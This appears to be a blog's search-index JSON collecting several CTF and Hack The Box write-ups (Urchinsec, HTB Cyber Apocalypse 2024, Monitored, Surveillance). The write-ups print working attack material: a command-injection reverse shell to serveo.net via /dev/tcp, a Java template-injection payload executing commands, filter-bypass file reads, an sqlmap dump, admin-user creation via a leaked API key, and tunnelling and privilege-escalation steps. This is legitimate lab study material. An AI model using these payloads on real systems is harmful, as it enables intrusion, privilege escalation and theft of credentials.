below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}]
\ No newline at end of file
+[{"content":"Writeup for urchinsec 2024 boot2root challenge This is the writeup for the boot 2 root challenge Bill Systems which i got the second solve.\nThis challneg requires knowledge in:\nrecon persistense lateral movement priviledge escalation Bill Systems categoty: boot2root difficulty: medium\nwe are given:\n1 2 3 SCOPE OF ENGAGEMENT domains : *.billsys.urc IP : 45.79.66.97 First we need to gather more info, so i ran an nmap scan to see open ports\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.7 (protocol 2.0) | ssh-hostkey: | 256 9e:cd:9e:38:58:35:4c:24:1a:01:29:0d:9d:26:fe:2b (ECDSA) |_ 256 50:35:25:83:7d:aa:d7:42:43:d4:bb:fa:e8:6c:12:bb (ED25519) 25/tcp filtered smtp 80/tcp open http |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:19 GMT | Content-Length: 0 | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:12 GMT | Content-Length: 0 | HTTPOptions: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:13 GMT |_ Content-Length: 0 443/tcp open https? 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=7748aed9b1afa3fe; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:13 GMT | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en-US\u0026#34; data-theme=\u0026#34;gitea-auto\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Gitea: Git with a cup of tea\u0026lt;/title\u0026gt; | \u0026lt;link rel=\u0026#34;manifest\u0026#34; href=\u0026#34;data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpem | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, no-transform | Set-Cookie: i_like_gitea=e41496a78b8b88ad; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxNDIyMDEyMDUyMzg0MjU2Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:20 GMT |_ Content-Length: 0 3306/tcp open mysql MariaDB (unauthorized) 3333/tcp open nagios-nsca Nagios NSCA 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC50%P=x86_64-pc-linux-gnu%r(G SF:etRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202 SF:024\\x2012:15:12\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions, SF:4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012: SF:15:13\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,67,\u0026#34;HTTP/1 SF:\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset SF:=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(FourOhF SF:ourRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x20 SF:2024\\x2012:15:19\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(GenericLine SF:s,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain SF:;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request SF:\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te SF:xt/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2 SF:0Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCo SF:ntent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n SF:\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20400 SF:\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\n SF:Connection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq,67, SF:\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20 SF:charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r( SF:Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20tex SF:t/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20 SF:Request\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent SF:-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n4 SF:00\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20R SF:equest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(SIPOptions,67,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r SF:\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port3000-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC51%P=x86_64-pc-linux-gnu%r SF:(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba SF:d\\x20Request\u0026#34;)%r(GetRequest,38A1,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr SF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo SF:ntent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git SF:ea=7748aed9b1afa3fe;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo SF:kie:\\x20_csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw;\\x SF:20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt SF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012:15:13\\x SF:20GMT\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en-US\\\u0026#34;\\x20data-theme= SF:\\\u0026#34;gitea-auto\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\\t\u0026lt;meta\\x20name=\\\u0026#34;viewport\\\u0026#34;\\x20content=\\\u0026#34;widt SF:h=device-width,\\x20initial-scale=1\\\u0026#34;\u0026gt;\\n\\t\u0026lt;title\u0026gt;Gitea:\\x20Git\\x20with\\x SF:20a\\x20cup\\x20of\\x20tea\u0026lt;/title\u0026gt;\\n\\t\u0026lt;link\\x20rel=\\\u0026#34;manifest\\\u0026#34;\\x20href=\\\u0026#34; SF:data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG SF:9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic SF:3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoi SF:aHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6Iml SF:tYWdlL3BuZyIsInNpem\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n SF:Content-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r SF:\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,197,\u0026#34;HTTP/1\\.0\\x20405\\x20Me SF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20GET\\r\\nCache-Cont SF:rol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nS SF:et-Cookie:\\x20i_like_gitea=e41496a78b8b88ad;\\x20Path=/;\\x20HttpOnly;\\x2 SF:0SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxN SF:DIyMDEyMDUyMzg0MjU2Mw;\\x20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20Sam SF:eSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20A SF:pr\\x202024\\x2012:15:20\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPR SF:equest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/ SF:plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Re SF:quest\u0026#34;); Only ports of interest were 22, 25 , 80 , 3306\non port 80 is bills portfolio other than that there is nothing interesting\nso we try and get the subdomains:\nThere are two subdomains :\ngit.billsys.urc - this is running a local instance of gittea storage.billsys.urc - this is running am instance of tiny file manager On git.billsys.urc we create an account and login. There are other users and repos but the one that sticks out is that of bill.\nIt is source code for a python web app called sesame.\nLooking at the commits we see a sqllite instance database that had been ommited we download it and view contents\ncracking the user hash we get the password\n1 ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f : password123 On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. It used defauld creds for tiny file manager.\n1 admin : admin@123 Here we can upload files , so i upload a php rev shell\nDropping to the shell we see that we are user \u0026ldquo;http\u0026rdquo;. There is no obvious method of priv esc.\nI was stuck here till i checked the open ports on the machine using netstat.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 38132/python3 tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp6 0 0 :::5355 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3000 :::* LISTEN - tcp6 0 0 :::3333 :::* LISTEN - As you see above there is a service on port 80 that is only accessed internally.\nTo access this from our attack box we will need to use a tunnel client like chisel. You can get chisel \u0026raquo; here\n1 2 on attackbox \u0026gt;\u0026gt; ./chisel server -p 8000 --reverse on chal machine \u0026gt;\u0026gt; ./chisel client \u0026lt;ip\u0026gt;:8000 R:8001:127.0.0.1:8080 After this we can access the service on port 80 which is the sesame application we got the src earlier.\nOn the sesame applicatiion we login with the creds we found in the sqlite db file.\nIf you read the src this application is used by bill to read files in the server.\nThere is nothing else interesting so i looked through the source code.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 in main.py def dashboard(): if request.method == \u0026#34;GET\u0026#34;: return render_template(\u0026#39;dash.html\u0026#39;) if request.method == \u0026#34;POST\u0026#34;: key = request.form.get(\u0026#34;key\u0026#34;) file_read = request.form.get(\u0026#34;fileread\u0026#34;) check_key = SesameKey.query.filter_by(key=key).first() if check_key is not None: num = 107 stk = chr(num) secret = \u0026#39;\u0026#39;.join([chr(ord(x) ^ ord(stk)) for x in key]) with open(\u0026#34;temp_secret\u0026#34;, \u0026#34;w\u0026#34;) as temp: temp.write(secret) command = f\u0026#34;sudo sesame -i temp_secret -r {file_read}\u0026#34; run = subprocess.check_output(command, shell=True) run = run.decode(\u0026#39;utf-8\u0026#39;) os.system(f\u0026#34;rm -rf temp_secret\u0026#34;) return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;It Works\u0026#34;) else: return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;Wrong Key\u0026#34;) If you look carefully our user input is not being sanitized and it is being put directly to subprocess module. Seeing this you immediately think command execution.\nThe catch is that the output of a command you run will not be displayed.\nSo after some trial i created:\n1 key=IpwnEazy@@#TH!ngG5~\u0026amp;fileread=/etc/passwd; bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/serveo.net/33997 0\u0026gt;\u0026amp;1\u0026#34;\u0026amp;action= This gets us a reverse shell. We are now the user bill. From here i created ssh keys so that i could login via ssh which is better and more stable.\nOur target now us to achieve root.\nRunning sudo -l we can see that our user can run \u0026ldquo;sesame\u0026rdquo; command with sudo rights.\nThis command is used earlier in the python application\n1 2 3 Running : sudo sesame -i temp_secret -r /etc/shadow Note: shadow file is only read by root so with this command we can read files as the root user. 1 2 3 4 5 6 7 8 9 Error: -i is a required argument Usage of sesame: -h\tPrints This Output -i string Input Secret File To Read Secret (-i /path/to/secret.txt) -r string File To Read (-r /path/to/filetoread.txt) -s\tChange Permissions Of Files It also supports changing of file permissions with -s flag.\nSO in order to read the root flag we can exploit this. So after some trial and error i did this\n1 2 3 4 5 6 7 8 9 10 11 12 sudo sesame -i temp_secret -s When it prompts for a file enter ../../../../../../root/. When it prompts for permission 777 This above will make the root permission be rwx by everyone.\n1 . (dot): This refers to the current directory. For example, if you\u0026#39;re in the directory /home/user, then . refers to /home/user. From here you can read the root flag\nflag : urchinsec{I_know_CTF_This_S3rV35_IS_we334akK_NEXTTTT}\n","date":"2024-04-28T18:07:14+03:00","image":"https://f0rk3b0mb.github.io/cover/urchinsec.png","permalink":"https://f0rk3b0mb.github.io/p/urchinsec_2024/","title":"Urchinsec_2024"},{"content":"This is the writeup of HTB cyber apocalypse 2024 web challenges.\nI participated with my team \u0026ldquo;Gang de la Sinfonia\u0026rdquo;.\nWeb Category TimeKORP rating: very easy\nHere you are provided with a webpage that has a parameter ?format=%H:%M:%D , from the source code it was running linux date command from that syntax.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 \u0026lt;?php class TimeModel { public function __construct($format) { $this-\u0026gt;command = \u0026#34;date \u0026#39;+\u0026#34; . $format . \u0026#34;\u0026#39; 2\u0026gt;\u0026amp;1\u0026#34;; } public function getTime() { $time = exec($this-\u0026gt;command); $res = isset($time) ? $time : \u0026#39;?\u0026#39;; return $res; } } This is classic command injection.\n1 payload : %H:%M:%D\u0026#39;;cat flag.txt flag: HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}\nKORP terminal rating: very easy\nFor this challnge you are provided with a login page that requires a username and password. So it has to be login bypass.\nGiven the rating of this challenge just throw sqlmap at it. You can also confirm this by using a single quote ,it return a sql error.\nOutput from slqmap\nFrom this we get a user admin and the password hash.\n1 admin: $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. 1 2 3 hashcat -m 3200 hashcat.txt /usr/share/wordlists/rockyou.txt $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123 Cracking the password using hashcat we get the password : password123\nWe can then login to get the flag\nflag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}\nFlag command rating: very easy\nHere we are given an applicating that requires a bunch of commands to navigate a puzzle. When you intercept the traffic using burp you will see an endpoint with a list of the commands.\nHere we can see a secret command. Using it\u0026hellip;\nflag: HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}\nLabrinth Linguist rating: easy\nHere we are given a webapp that translates text that we give it.\nOooooh its a java application. I wasnt expecting thsi to be straight forward. But \u0026hellip;\n1 2 3 4 5 6 7 String template = \u0026#34;\u0026#34;; try { template = readFileToString(\u0026#34;/app/src/main/resources/templates/index.html\u0026#34;, textString); } catch (IOException e) { e.printStackTrace(); } Our input was being used in a template. This is dangerous if no filters are applied. I quickly googled SSTI in java (Server Side Template Injection) payloads. Got this \u0026raquo; here .\nFrom here we can execute commands and cat the flag. Credits to Anshul for doing this. I had a problem using the payload in burp suite due to the newlines.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 #set($s=\u0026#34;\u0026#34;) #set($stringClass=$s.getClass()) #set($stringBuilderClass=$stringClass.forName(\u0026#34;java.lang.StringBuilder\u0026#34;)) #set($inputStreamClass=$stringClass.forName(\u0026#34;java.io.InputStream\u0026#34;)) #set($readerClass=$stringClass.forName(\u0026#34;java.io.Reader\u0026#34;)) #set($inputStreamReaderClass=$stringClass.forName(\u0026#34;java.io.InputStreamReader\u0026#34;)) #set($bufferedReaderClass=$stringClass.forName(\u0026#34;java.io.BufferedReader\u0026#34;)) #set($collectorsClass=$stringClass.forName(\u0026#34;java.util.stream.Collectors\u0026#34;)) #set($systemClass=$stringClass.forName(\u0026#34;java.lang.System\u0026#34;)) #set($stringBuilderConstructor=$stringBuilderClass.getConstructor()) #set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass)) #set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass)) #set($runtime=$stringClass.forName(\u0026#34;java.lang.Runtime\u0026#34;).getRuntime()) #set($process=$runtime.exec(\u0026#34;cat ../flag2023911480.txt\u0026#34;)) #set($null=$process.waitFor() ) #set($inputStream=$process.getInputStream()) #set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream)) #set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader)) #set($stringBuilder=$stringBuilderConstructor.newInstance()) #set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator()))) $output Just use the payload in the browser and capture the request in burp.\nflag : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}\nLocktalk rating: medium\nThis is where things got interesting.\nHere you are given a webapplication with an api blueprint.\nThe api had three routes:\n1 2 3 4 5 /flag protected by middleware /chat/\u0026lt;int:chat_id\u0026gt; protected by middleware /get_ticket open but blocked by ha proxy A quick look at the proxy configuration\n1 2 3 4 5 frontend haproxy bind 0.0.0.0:1337 default_backend backend http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } So we had to find a way to bypass this. I used a lot of time on this part. Until i found this \u0026raquo; here\nTo make your search easier you had to find the ha proxy version from the dockerfile : PS i had forgotten do thsi , it could have made my work easier.\n1 2 3 4 5 6 WORKDIR /tmp RUN wget https://www.haproxy.org/download/2.8/src/haproxy-2.8.1.tar.gz \u0026amp;\u0026amp; \\ tar zxvf haproxy-*.tar.gz \u0026amp;\u0026amp; cd haproxy-* \u0026amp;\u0026amp; \\ make TARGET=linux-musl \u0026amp;\u0026amp; \\ make install RUN rm -rf * From the article if we make a request to /api/v1/get_ticket we get denied but if we make request to /api/v1/get_ticket# we bypass the acl.\nFrom here i gotr the jwt token. I tries common methos of exploiting jwt but none of them worked. UNtil i searched for a vulnerability in python_jwt==3.3.3 from the requirements.txt\nI found this vulnerability that enables us to bypass the jwt verification \u0026raquo; here and for the exploit \u0026raquo; here\nWe change our role to administrator and then read the flag\nflag: HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}\nTestimonial Here we are given a webapplication that accepts parameters customer and testimonial.\nIt is a go webapplication witha grpc endpoint. I saw some people asking on the discord why there were two ip addresses. One if for the main webapp and one was for grpc. Read more about grpc \u0026raquo; here\nIve encountered with grpc before. So the tools we will need are grpcurl and grpcui. In this context grpcui will not work.\n1 grpcurl -plaintext -import-path ./ -proto ptypes.proto -d \u0026#39;{\u0026#34;customer\u0026#34;: \u0026#34;examplecusomer\u0026#34;, \u0026#34;testimonial\u0026#34;: \u0026#34;exampletestimonial\u0026#34;}\u0026#39; 94.237.59.119:45387 RickyService.SubmitTestimonial Above is the format for grpcurl. Breakdown:\nptypes.proto file is in the pb folder . This is used to enable grpcurl to interact with the server since service enumaration was disables . This is what caused grpcui not to work.\nThe service and method name can be found in the source code.\nUsing this will also enable you to bypass the filter that was placed in the code\n1 2 3 for _, char := range []string{\u0026#34;/\u0026#34;, \u0026#34;\\\\\u0026#34;, \u0026#34;:\u0026#34;, \u0026#34;*\u0026#34;, \u0026#34;?\u0026#34;, \u0026#34;\\\u0026#34;\u0026#34;, \u0026#34;\u0026lt;\u0026#34;, \u0026#34;\u0026gt;\u0026#34;, \u0026#34;|\u0026#34;, \u0026#34;.\u0026#34;} { customer = strings.ReplaceAll(customer, char, \u0026#34;\u0026#34;) } NOTE: Beyond this point i did after the ctf , i did not solve this one.\nOfficial writeup \u0026raquo; https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BEasy%5D%20Testimonial\n","date":"2024-03-11T13:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/ca2024.png","permalink":"https://f0rk3b0mb.github.io/p/htb_cyberapocalypse_2024/","title":"HTB_cyberapocalypse_2024"},{"content":"HTB monitored Writeup for HTB monitored box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT Warning: 10.10.11.248 giving up on port because retransmission cap hit (6). Nmap scan report for monitored.htb (10.10.11.248) Host is up (0.36s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (unsynchronized) | ntp-info: |_ 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 6f3fa7421af94c6500000000 | snmpEngineBoots: 35 |_ snmpEngineTime: 48m05s | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:389 0.0.0.0:0 | TCP 127.0.0.1:25 0.0.0.0:0 |_ UDP 0.0.0.0:68 *:* | snmp-processes: | 1: | | 2: | |_ 3: | snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64 |_ System uptime: 48m5.77s (288577 timeticks) |_snmp-win32-software: 162/udp open snmp net-snmp; net-snmp SNMPv3 server | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 5a44ab2146ff4c6500000000 | snmpEngineBoots: 26 |_ snmpEngineTime: 48m05s 1100/udp open|filtered mctp 1813/udp open|filtered radacct 3130/udp open|filtered squid-ipc 19500/udp open|filtered unknown 22053/udp open|filtered unknown 27444/udp open|filtered Trinoo_Bcast 44190/udp open|filtered unknown 49259/udp open|filtered unknown Service Info: Host: monitored Host script results: |_clock-skew: 10s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds Snmp enumeration\n1 snmpwalk -v1 -c public monitored.htb we get creds for username: svc pass: XjH7VCehowpR1xZB\nMaking a post request to /api/v1/authenticate we get access token that we can use to login\n1 2 https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0 this nagios is vulnerable to sql injection \u0026raquo; see here\n1 sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=40ka0uvgngmjev8i267hq2qt9p\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump Dumping the db enables us to get an admin api key : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nWe can now create our owm user with full privilldeges\n1 curl -XPOST -k \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=test\u0026amp;password=test\u0026amp;name=test\u0026amp;email=test@test.com\u0026amp;auth_level=admin\u0026#34; Uploads a reverse shell by creating a command and checking it\nuser.txt 5428c0b228e51f2428525f3faa3fcca2\nTo escalate privilldges we modify the setuid binary npcd\nroot.txt 9893d1d8c72bc11111a49fcb508ac07a\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_monitored/","title":"Htb_monitored"},{"content":"HTB surveillance Writeup for htb surveillnace box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT Nmap scan report for 10.10.11.245 Host is up (0.30s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds A cms is running in port 80 , craft cms\nIt is vulnerable to rce CVE-2023-41892\nThere are 2 :\nmatthew zoneminder Further enumartion we get a backup file surveillance\u0026ndash;2023-10-17-202801\u0026ndash;v4.4.14.sql.zip. It has a sql backup of the database , here we get creds for the user matthew.\nuser.txt 260ecc03cedb8e78d80a6658b5b22eac\nWe also get the creda for zoneminder in the ZoneMinder config files password : ZoneMinderPassword2023\nZoneminder is a service running on port 8080, So we tunnel using ssh to access it.\nIt is vulnerable to rce CVE-2023-26035\nTo escalate priviledges and read root flag\n1 sudo /usr/bin/zmupdate.pl 